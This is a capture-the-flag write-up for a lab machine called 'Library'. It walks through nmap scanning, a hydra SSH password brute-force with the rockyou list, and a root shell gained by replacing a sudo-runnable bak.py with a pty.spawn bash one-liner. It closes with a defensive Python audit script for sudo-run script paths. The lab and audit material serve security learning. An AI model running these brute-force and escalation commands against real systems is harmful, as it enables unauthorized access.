# Library

![](/files/-McQD5e313TgVcGeL7j5)

## Reconnaissance

Initial nmap scan to find open ports, using the **-Pn** flag ("treat all hosts as alive"):

```
nmap -Pn 10.10.121.105
```

![](/files/-McQDkqutBBnV0UmzaCl)

Detailed Nmap scan:

Command breakdown:

* (**-sV**): Service version
* (**-sC**): Default nmap scripts
* (**-p**): Specifying ports 22,80
* (**-oN nmap**): Saving it into a file called nmap

```
nmap -sV -sC -p 22,80 -oN nmap 10.10.121.105
```

![](/files/-McQDurr0GhfB8IsC9IL)

## Enumeration

Let's visit the webpage.

![](/files/-McQE23d1bajrG2bXDKv)

Looking through the website, we find a username: `meliodas`.

Let's look at `robots.txt`, as the nmap scan told us that there is a disallowed entry.

![](/files/-McQEh9ZZZ8wI8fPSMe0)

There is nothing there. Let's run `gobuster` to find hidden directories, as there is nothing else on the main page to enumerate.

![](/files/-McQF8wv4ZJqU97KTCVM)

Nothing interesting pops up, so let's run hydra to brute-force SSH with the username `meliodas`.

## Exploitation

```
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://10.10.121.105/
```

![](/files/-McQG9Sw_PL2Id91NjeD)

We have the password. Let's log in through SSH.

![](/files/-McQGT1agcb29OqzrQHc)

We can read the `user.txt` file.

![](/files/-McQGbsbTnslgXXYlg1W)

## Privilege Escalation

We have a file called `bak.py`. Let's read it and look at its permissions.

![](/files/-McQGwPrLV6c0boKFbBw)

It's owned by root! We can also run this file as root.

![](/files/-McQHBc7IcNLzmw2gOXa)

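Let's change the contents of the file to get a shell as root. We cannot change the contents of the file directly, so let's remove the file and create a new file with the same name and our own content. This works because `bak.py` sits in our own home directory (`/home/meliodas`): deleting or creating a file requires write permission on the directory, not on the file itself.

First, delete the file with this command: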

```
rm bak.py
```

Now we can echo the script into the file:

```
echo 'import pty; pty.spawn("/bin/bash")' > /home/meliodas/bak.py
```

![](/files/-McQI5rQhHYruNV2983A)

Now let's run the file.

![](/files/-McQIDvUOqwGQ0-MrIo4)

We are now root, and we can read the `root.txt` file.

![](/files/-McQINgHKsxxQDyOhP9s)
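The root cause of this escalation is a root-runnable script stored in a directory its caller controls. The following audit check is an added example, not part of the original write-up or the room: it walks a script path up to `/` and reports every component a non-root account could use to swap the file. The uid 1000 for `meliodas`, the file modes, and the `/opt/backup` location are constructed assumptions.

```python
import os
import stat
from types import SimpleNamespace

def audit_path(path, trusted_uids=frozenset({0}), lstat=os.lstat):
    """Return (component, reason) pairs for every part of `path` that an
    untrusted account could use to replace the file."""
    findings = []
    current = os.path.abspath(path)
    while True:
        st = lstat(current)
        if st.st_uid not in trusted_uids:
            # The owner can always rewrite or chmod what they own.
            findings.append((current, f"owned by uid {st.st_uid}"))
        elif stat.S_ISLNK(st.st_mode):
            findings.append((current, "symlink, audit its target too"))
        elif stat.S_ISDIR(st.st_mode):
            # Write permission on a directory allows unlink/rename of its
            # entries whoever owns them, unless the sticky bit is set.
            if st.st_mode & 0o022 and not st.st_mode & stat.S_ISVTX:
                findings.append((current, "group/other-writable directory"))
        elif st.st_mode & 0o022:
            findings.append((current, "group/other-writable file"))
        parent = os.path.dirname(current)
        if parent == current:  # reached the filesystem root
            return findings
        current = parent

# Constructed sample: path -> (owner uid, mode). uid 1000 for meliodas
# and the /opt/backup location are assumptions for illustration.
SAMPLE = {
    "/": (0, 0o040755),
    "/home": (0, 0o040755),
    "/home/meliodas": (1000, 0o040755),
    "/home/meliodas/bak.py": (0, 0o100644),
    "/opt": (0, 0o040755),
    "/opt/backup": (0, 0o040755),
    "/opt/backup/bak.py": (0, 0o100644),
}

def sample_lstat(p):
    uid, mode = SAMPLE[p]
    return SimpleNamespace(st_uid=uid, st_mode=mode)

if __name__ == "__main__":
    for target in ("/home/meliodas/bak.py", "/opt/backup/bak.py"):
        print(target, audit_path(target, lstat=sample_lstat) or "OK")
```

On a live host, call `audit_path()` without the `lstat` argument for each script that a sudo rule lets a non-root user run.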
